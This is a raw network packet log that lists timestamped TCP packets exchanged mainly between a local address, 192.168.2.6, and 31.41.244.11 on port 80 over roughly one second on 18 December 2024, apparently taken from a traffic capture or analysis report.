                                                                                                                                                              Dec 18, 2024 11:47:44.887141943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.887181044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.888272047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.888317108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.888384104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.888425112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.891374111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.891392946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.891408920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.891424894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.891433954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.891469002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.891469002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.892494917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.892514944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.892548084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.892561913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.893440008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.893487930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.893572092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.893616915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.894495010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.894543886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.894629955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.894673109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.895576954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.895620108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.895723104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.895761967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.896836042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.896853924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.896893978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.897855997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.897903919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.897984982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.898032904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.899163008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.899209023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.899249077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.899302959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.900136948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.900180101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.900392056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.900434017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.901226044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.901273012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.901602983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.901647091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.902601004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.902638912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.902811050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.902858019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.904066086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.904134989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.904138088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.904172897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.905025959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.905070066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.905106068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.905121088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.906177044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.906233072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.035039902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.035145998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.035156012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.035195112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.035598993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.035645008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.035674095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.035716057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.036808968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.036855936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.036943913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.036988020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.037974119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.038019896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.038100004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.038142920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.039205074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.039251089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.039256096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.039328098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.040872097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.040923119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.041034937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.041089058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.041883945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.041930914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.041966915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.042005062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.042716026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.042762995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.042833090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.042874098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.043921947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.043975115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.044083118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.044123888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.045063019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.045106888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.045119047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.045157909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.046293974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.046339989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.046386957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.046428919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.047444105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.047488928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.047512054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.047552109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.048644066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.048688889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.048733950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.048774004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.049877882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.049936056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.049968004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.050009012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.050987005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.051033020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.051071882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.051111937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.052200079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.052251101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.052261114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.052301884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.053339005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.053389072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.053455114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.053497076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.054570913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.054619074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.054662943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.054702044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.055165052 CET49886443192.168.2.6104.21.64.80
                                                                                                                                                              Dec 18, 2024 11:47:45.055704117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.055751085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.055835962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.055871964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.056909084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.056961060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.057045937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.057085991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.058065891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.058114052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.058176994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.058216095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.059237957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.059286118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.059367895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.059410095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.060518980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.060575008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.060621023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.060662985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.061603069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.061635017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.061666965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.061681032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.062848091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.062911987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.062968016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.063009977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.063990116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.064040899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.064042091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.064079046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.065188885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.065246105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.065319061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.065361977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.066400051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.066448927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.066493988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.066534996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.067550898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.067601919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.067646980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.067688942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.068706989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.068753958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.068835974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.068876028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.069905043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.069998026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.070034027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.070076942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.071139097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.071203947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.071252108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.071295023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.072285891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.072340965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.072401047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.072444916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.073507071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.073553085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.073582888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.073628902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.074640036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.074692965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.074758053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.074806929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.075817108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.075860023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.075912952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.075951099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.076998949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.077053070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.077229977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.077275038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.078182936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.078237057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.078286886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.078335047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.079370975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.079416990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.079447031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.079518080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.080569983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.080621958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.080723047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.080764055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.081763983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.081799984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.081815958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.081831932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.082976103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.083023071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.083199024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.083236933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.084171057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.084223986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.084285021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.084317923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.085303068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.085359097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.085402966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.085443020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.086482048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.086525917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.086587906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.086628914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.087719917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.087765932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.087789059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.087822914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.088839054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.088876009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.088923931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.088964939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.090131998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.090174913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.090179920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.090213060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.091190100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.091231108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.091387033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.091428995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.092489958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.092542887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.092570066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.092602968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.093729973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.093780994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.093849897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.093889952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.094825029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.094870090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.094928980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.094964981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.095992088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.096040964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.096102953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.096143007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.097110033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.097174883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.226210117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.226255894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.226294041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.226326942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.226386070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.226464033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.226485014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.226526022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.227617979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.227663040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.227663040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.227715969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.228800058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.228842020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.228871107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.228904963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.229633093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.229675055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.229736090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.229772091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.230904102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.230947018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.230979919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.231018066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.232062101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.232105970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.232180119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:45.232215881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:45.233184099 CET804987831.41.244.11192.168.2.6
